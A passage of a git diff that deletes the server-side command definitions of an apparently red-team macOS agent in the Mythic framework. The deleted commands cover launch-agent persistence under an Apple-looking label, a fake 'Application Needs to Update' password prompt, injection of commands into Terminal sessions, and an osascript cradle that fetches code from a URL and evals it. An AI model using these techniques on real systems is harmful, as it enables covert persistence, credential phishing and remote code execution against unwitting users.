False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = PersistFolderactionArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of System Events", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/persist_launch.py b/Payload_Types/apfell/mythic/agent_functions/persist_launch.py deleted file mode 100644 index c6884cbbc..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_launch.py +++ /dev/null @@ -1,76 +0,0 @@ -from CommandBase import * -import json - - -class PersistLaunchArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "args": CommandParameter( - name="args", - type=ParameterType.Array, - description="List of arguments to execute in the ProgramArguments section of the PLIST", - ), - "KeepAlive": CommandParameter( - name="KeepAlive", - type=ParameterType.Boolean, - default_value=True, - description="Restart the persistence if it crashes for some reason", - ), - "label": CommandParameter( - name="label", - type=ParameterType.String, - default_value="com.apple.softwareupdateagent", - description="The label for the launch element", - ), - "LaunchPath": CommandParameter( - name="LaunchPath", - type=ParameterType.String, - required=False, - description="Path to save new plist to if LocalAgent is false", - ), - "LocalAgent": CommandParameter( - name="LocalAgent", - type=ParameterType.Boolean, - default_value=True, - description="Should be a local user launch agent?", - ), - "RunAtLoad": CommandParameter( - name="RunAtLoad", - type=ParameterType.Boolean, - default_value=True, - description="Should the launch element be executed at load", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class PersistLaunchCommand(CommandBase): - cmd = "persist_launch" - needs_admin = False - help_cmd = "persist_launch" - description = "Create a launch agent or daemon plist file and either automatically put it in ~/Library/LaunchAgents or if LocalAgent is false, save it to the specified location. If you want an elevated launch agent or launch daemon( /Library/LaunchAgents or /Library/LaunchDaemons), you either need to be in an elevated context already and specify the path or use something like shell_elevated to copy it there. If the first arg is 'apfell-jxa' then the agent will automatically construct a plist appropriate oneliner to use where arg1 should be the URL to reach out to for the payload." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1159", "T1160"] - argument_class = PersistLaunchArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/persist_loginitem_allusers.py b/Payload_Types/apfell/mythic/agent_functions/persist_loginitem_allusers.py deleted file mode 100644 index 28fed1153..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_loginitem_allusers.py +++ /dev/null @@ -1,56 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PersistLoginItemAllUsersArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="path to binary to execute on execution", - ), - "name": CommandParameter( - name="name", - type=ParameterType.String, - description="The name that is displayed in the Login Items section of the Users & Groups preferences pane", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class PersistLoginItemAllUsersCommand(CommandBase): - cmd = "persist_loginitem_allusers" - needs_admin = False - help_cmd = "persist_loginitem_allusers" - description = "Add a login item for all users via the LSSharedFileListInsertItemURL. The kLSSharedFileListGlobalLoginItems constant is used when creating the shared list in the LSSharedFileListCreate function. Before calling LSSharedFileListInsertItemURL, AuthorizationCreate is called to obtain the necessary rights. If the current user is not an administrator, the LSSharedFileListInsertItemURL function will fail" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@xorrior" - attackmapping = [] - argument_class = PersistLoginItemAllUsersArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.LSSharedFileListCreate, $.LSSharedFileListSetAuthorization, $.LSSharedFileListInsertItemURL", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/plist.py b/Payload_Types/apfell/mythic/agent_functions/plist.py deleted file mode 100644 index 69367a1cd..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/plist.py +++ /dev/null @@ -1,59 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PlistArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "filename": CommandParameter( - name="filename", - type=ParameterType.String, - required=False, - description="full filename path of type is just read", - ), - "type": CommandParameter( - name="type", - type=ParameterType.ChooseOne, - choices=["readLaunchAgents", "readLaunchDaemons", "read"], - description="read a specific plist file or all launchagents/launchdaemons", - default_value="readLaunchAgents", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class PlistCommand(CommandBase): - cmd = "plist" - needs_admin = False - help_cmd = "plist" - description = "Read plists and their associated attributes for attempts to privilege escalate." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1083", "T1007"] - argument_class = PlistArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSMutableDictionary.alloc.initWithContentsOfFile, fileManager.attributesOfItemAtPathError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/prompt.py b/Payload_Types/apfell/mythic/agent_functions/prompt.py deleted file mode 100644 index 5856d8743..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/prompt.py +++ /dev/null @@ -1,68 +0,0 @@ -from CommandBase import * -import json - - -class PromptArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "title": CommandParameter( - name="title", - type=ParameterType.String, - description="Title of the dialog box", - required=False, - default_value="Application Needs to Update", - ), - "icon": CommandParameter( - name="icon", - type=ParameterType.String, - required=False, - description="full path to .icns file to use", - default_value="/System/Library/CoreServices/Software Update.app/Contents/Resources/SoftwareUpdate.icns", - ), - "text": CommandParameter( - name="text", - type=ParameterType.String, - required=False, - description="additional descriptive text to display", - default_value="An application needs permission to update", - ), - "answer": CommandParameter( - name="answer", - type=ParameterType.String, - required=False, - description="Default answer to pre-populate", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON argument") - else: - raise ValueError("Missing arguments") - - -class PromptCommand(CommandBase): - cmd = "prompt" - needs_admin = False - help_cmd = "prompt" - description = "Create a custom prompt to ask the user for credentials where you can provide titles, icons, text and default answer." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1141"] - argument_class = PromptArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/pwd.py b/Payload_Types/apfell/mythic/agent_functions/pwd.py deleted file mode 100644 index a3da69b0a..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/pwd.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PwdArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class PwdCommand(CommandBase): - cmd = "pwd" - needs_admin = False - help_cmd = "pwd" - description = "Prints the current working directory for the agent" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1083"] - argument_class = PwdArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.currentDirectoryPath", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/rm.py b/Payload_Types/apfell/mythic/agent_functions/rm.py deleted file mode 100644 index c78c35879..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/rm.py +++ /dev/null @@ -1,57 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class RmArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="Path to file to remove", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - temp_json = json.loads(self.command_line) - if "host" in temp_json: - # this means we have tasking from the file browser rather than the popup UI - # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it - self.add_arg("path", temp_json["path"] + "/" + temp_json["file"]) - else: - self.add_arg("path", temp_json["path"]) - else: - self.add_arg("path", self.command_line) - else: - raise ValueError("Missing arguments") - - -class RmCommand(CommandBase): - cmd = "rm" - needs_admin = False - help_cmd = "rm [path]" - description = "Remove a file, no quotes are necessary and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = True - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106", "T1107"] - argument_class = RmArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.removeItemAtPathError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/run.py b/Payload_Types/apfell/mythic/agent_functions/run.py deleted file mode 100644 index e2a6a312a..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/run.py +++ /dev/null @@ -1,59 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class RunArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "args": CommandParameter( - name="args", - type=ParameterType.Array, - description="Arguments to pass to the binary", - ), - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="Full path to binary to execute", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class RunCommand(CommandBase): - cmd = "run" - needs_admin = False - help_cmd = "run" - description = "The command uses the ObjectiveC bridge to spawn that process with those arguments on the computer and get your output back. It is not interactive and does not go through a shell, so be sure to specify the full path to the binary you want to run." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106"] - argument_class = RunArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{} {}".format( - task.args.get_arg("path"), - " ".join(task.args.get_arg("args")) - ), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/screenshot.py b/Payload_Types/apfell/mythic/agent_functions/screenshot.py deleted file mode 100644 index 3e579a437..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/screenshot.py +++ /dev/null @@ -1,43 +0,0 @@ -from CommandBase import * -import json -import datetime -from MythicResponseRPC import * - - -class ScreenshotArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ScreenshotCommand(CommandBase): - cmd = "screenshot" - needs_admin = False - help_cmd = "screenshot" - description = "Use the built-in CGDisplay API calls to capture the display and send it back over the C2 channel. No need to specify any parameters as the current time will be used as the file name" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - parameters = [] - attackmapping = ["T1113"] - argument_class = ScreenshotArguments - browser_script = BrowserScript(script_name="screenshot", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - task.args.command_line += str(datetime.datetime.utcnow()) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.CGDisplayCreateImage($.CGMainDisplayID());, $.NSBitmapImageRep.alloc.initWithCGImage(cgimage);", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/security_info.py b/Payload_Types/apfell/mythic/agent_functions/security_info.py deleted file mode 100644 index 5ae7d7833..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/security_info.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class SecurityInfoArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class SecurityInfoCommand(CommandBase): - cmd = "security_info" - needs_admin = False - help_cmd = "security_info" - description = 'This uses JXA to list some security information about the system by contacting the "System Events" application via Apple Events. This can cause a popup or be denied in Mojave and later' - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1201"] - argument_class = SecurityInfoArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of System Events", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/shell.py b/Payload_Types/apfell/mythic/agent_functions/shell.py deleted file mode 100644 index 3986920fd..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/shell.py +++ /dev/null @@ -1,57 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ShellArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", type=ParameterType.String, description="Command to run" - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("command", self.command_line) - else: - raise ValueError("Missing arguments") - - -class ShellCommand(CommandBase): - cmd = "shell" - needs_admin = False - help_cmd = "shell {command}" - description = """ - This runs {command} in a terminal by leveraging JXA's Application.doShellScript({command}). - -WARNING! THIS IS SINGLE THREADED, IF YOUR COMMAND HANGS, THE AGENT HANGS! - """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1059"] - argument_class = ShellArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/shell_elevated.py b/Payload_Types/apfell/mythic/agent_functions/shell_elevated.py deleted file mode 100644 index 9769f27ec..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/shell_elevated.py +++ /dev/null @@ -1,90 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ShellElevatedArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="Command to execute", - ), - "use_creds": CommandParameter( - name="use_creds", - type=ParameterType.Boolean, - description="Use supplied creds or prompt the user for creds", - ), - "user": CommandParameter( - name="user", type=ParameterType.Credential_Account, - required=False - ), - "credential": CommandParameter( - name="credential", type=ParameterType.Credential_Value, - required=False - ), - "prompt": CommandParameter( - name="prompt", - type=ParameterType.String, - description="What prompt to display to the user when asking for creds", - required=False - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class ShellElevatedCommand(CommandBase): - cmd = "shell_elevated" - needs_admin = False - help_cmd = "shell_elevated" - description = """ - The command will pop a dialog box for the user asking for them to authenticate (fingerprint reader too) so that the command you entered will be executed in an elevated context. Alternatively, you can supply a username and password and the command will run under their context (assuming they have the right permissions). Once you successfully authenticate, you have a time window where no more popups will occur, but you'll still execute subsequent commands in an elevated context. - -WARNING! THIS IS SINGLE THREADED, IF YOUR COMMAND HANGS, THE AGENT HANGS! - """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1059", "T1141", "T1169"] - argument_class = ShellElevatedArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/sleep.py b/Payload_Types/apfell/mythic/agent_functions/sleep.py deleted file mode 100644 index 7bc370306..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/sleep.py +++ /dev/null @@ -1,64 +0,0 @@ -from CommandBase import * -import json - - -def positiveTime(val): - if val < 0: - raise ValueError("Value must be positive") - - -class SleepArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "jitter": CommandParameter( - name="jitter", - type=ParameterType.Number, - validation_func=positiveTime, - required=False, - description="Percentage of C2's interval to use as jitter", - ), - "interval": CommandParameter( - name="interval", - type=ParameterType.Number, - required=False, - validation_func=positiveTime, - description="Number of seconds between checkins", - ), - } - - async def parse_arguments(self): - if self.command_line[0] != "{": - pieces = self.command_line.split(" ") - if len(pieces) == 1: - self.add_arg("interval", pieces[0]) - elif len(pieces) == 2: - self.add_arg("interval", pieces[0]) - self.add_arg("jitter", pieces[1]) - else: - raise Exception("Wrong number of parameters, should be 1 or 2") - else: - self.load_args_from_json_string(self.command_line) - - -class SleepCommand(CommandBase): - cmd = "sleep" - needs_admin = False - help_cmd = "sleep [interval] [jitter]" - description = "Modify the time between callbacks in seconds." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1029"] - argument_class = SleepArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/spawn_download_cradle.py b/Payload_Types/apfell/mythic/agent_functions/spawn_download_cradle.py deleted file mode 100644 index ad88605fe..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/spawn_download_cradle.py +++ /dev/null @@ -1,51 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class SpawnDownloadCradleArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "url": CommandParameter( - name="url", - type=ParameterType.String, - description="full URL of hosted payload", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("url", self.command_line) - else: - raise ValueError("Missing arguments") - - -class SpawnDownloadCradleCommand(CommandBase): - cmd = "spawn_download_cradle" - needs_admin = False - help_cmd = "spawn_download_cradle" - description = "Spawn a new osascript download cradle as a backgrounded process to launch a new callback" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = SpawnDownloadCradleArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/usr/bin/osascript -l JavaScript -e \"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('{}')),$.NSUTF8StringEncoding)));\"".format(task.args.get_arg("url")), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/spawn_drop_and_execute.py b/Payload_Types/apfell/mythic/agent_functions/spawn_drop_and_execute.py deleted file mode 100644 index 2e6b91248..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/spawn_drop_and_execute.py +++ /dev/null @@ -1,68 +0,0 @@ -from CommandBase import * -import json -from MythicFileRPC import * -from MythicPayloadRPC import * -import asyncio - - -class SpawnDropAndExecuteArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "template": CommandParameter( - name="template", - type=ParameterType.Payload, - description="apfell agent to use as template to generate a new payload", - supported_agents=["apfell"], - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class SpawnDropAndExecuteCommand(CommandBase): - cmd = "spawn_drop_and_execute" - needs_admin = False - help_cmd = "spawn_drop_and_execute" - description = "Generate a new payload, drop it to a temp location, execute it with osascript as a background process, and then delete the file. Automatically reports back the temp file it created" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = SpawnDropAndExecuteArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - gen_resp = await MythicPayloadRPC(task).build_payload_from_template( - task.args.get_arg("template") - ) - if gen_resp.status == MythicStatus.Success: - # we know a payload is building, now we want it - while True: - resp = await MythicPayloadRPC(task).get_payload_by_uuid(gen_resp.uuid) - if resp.status == MythicStatus.Success: - if resp.build_phase == "success": - # it's done, so we can register a file for it - task.args.add_arg("template", resp.agent_file_id) - break - elif resp.build_phase == "error": - raise Exception( - "Failed to build new payload: " + resp.error_message - ) - else: - await asyncio.sleep(1) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/system_info.py b/Payload_Types/apfell/mythic/agent_functions/system_info.py deleted file mode 100644 index 2ce692d3e..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/system_info.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class SystemInfoArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class SystemInfoCommand(CommandBase): - cmd = "system_info" - needs_admin = False - help_cmd = "system_info" - description = "This uses JXA to get some system information. It doesn't send Apple Events to any other applications though, so it shouldn't cause popups." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1082"] - argument_class = SystemInfoArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="currentApp.systemInfo()", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/terminals_read.py b/Payload_Types/apfell/mythic/agent_functions/terminals_read.py deleted file mode 100644 index b516c9495..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/terminals_read.py +++ /dev/null @@ -1,58 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class TerminalsReadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "level": CommandParameter( - name="level", - type=ParameterType.ChooseOne, - choices=["contents", "history"], - description="How much data to retrive - what's viewable or all history", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class TerminalsReadCommand(CommandBase): - cmd = "terminals_read" - needs_admin = False - help_cmd = "terminals_read" - description = """ - This uses AppleEvents to read information about open instances of Apple's Terminal.app. The contents flag allows you to see exactly what the user can see at that moment on the screen. The history flag allows you to see everything that's in that tab's scroll history. This can be a lot of information, so keep that in mind. This function will also give you the window/tab information for each open session and a bunch of other information. -Ex: terminals_read history - """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1139", "T1056"] - argument_class = TerminalsReadArguments - browser_script = BrowserScript( - script_name="terminals_read", author="@its_a_feature_" - ) - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Terminal", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/terminals_send.py b/Payload_Types/apfell/mythic/agent_functions/terminals_send.py deleted file mode 100644 index 4e604e088..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/terminals_send.py +++ /dev/null @@ -1,69 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class TerminalsSendArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "window": CommandParameter( - name="window", - type=ParameterType.Number, - description="window # to send command to", - ), - "tab": CommandParameter( - name="tab", - type=ParameterType.Number, - description="tab # to send command to", - ), - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="command to execute", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class TerminalsSendCommand(CommandBase): - cmd = "terminals_send" - needs_admin = False - help_cmd = "terminals_send" - description = """ - This uses AppleEvents to inject the shell command, {command}, into the specified terminal shell as if the user typed it from the keyboard. This is pretty powerful. Consider the instance where the user is SSH-ed into another machine via terminal - with this you can inject commands to run on the remote host. Just remember, the user will be able to see the command, but you can always see what they see as well with the "terminals_read contents" command. - """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1059", "T1184"] - argument_class = TerminalsSendArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{}".format( - task.args.get_arg("command"), - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Terminal", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/test_password.py b/Payload_Types/apfell/mythic/agent_functions/test_password.py deleted file mode 100644 index 8f1447f30..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/test_password.py +++ /dev/null @@ -1,61 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class TestPasswordArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "password": CommandParameter( - name="password", - type=ParameterType.Credential_Value, - description="Password to test", - ), - "username": CommandParameter( - name="username", - type=ParameterType.Credential_Account, - description="Local user to test against", - ), - } - - async def parse_arguments(self): - if self.command_line[0] != "{": - pieces = self.command_line.split(" ") - if len(pieces) < 2: - raise Exception("Wrong number of parameters, should be 2") - self.add_arg("username", pieces[0]) - self.add_arg("password", " ".join(pieces[1:])) - else: - self.load_args_from_json_string(self.command_line) - - -class TestPasswordCommand(CommandBase): - cmd = "test_password" - needs_admin = False - help_cmd = "test_password username password" - description = "Tests a password against a user to see if it's valid via an API call" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1110"] - argument_class = TestPasswordArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.ODNode.nodeWithSessionTypeError, recordWithRecordTypeNameAttributesError", - artifact_type="API Called", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="user.verifyPasswordError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/upload.py b/Payload_Types/apfell/mythic/agent_functions/upload.py deleted file mode 100644 index 20045b271..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/upload.py +++ /dev/null @@ -1,62 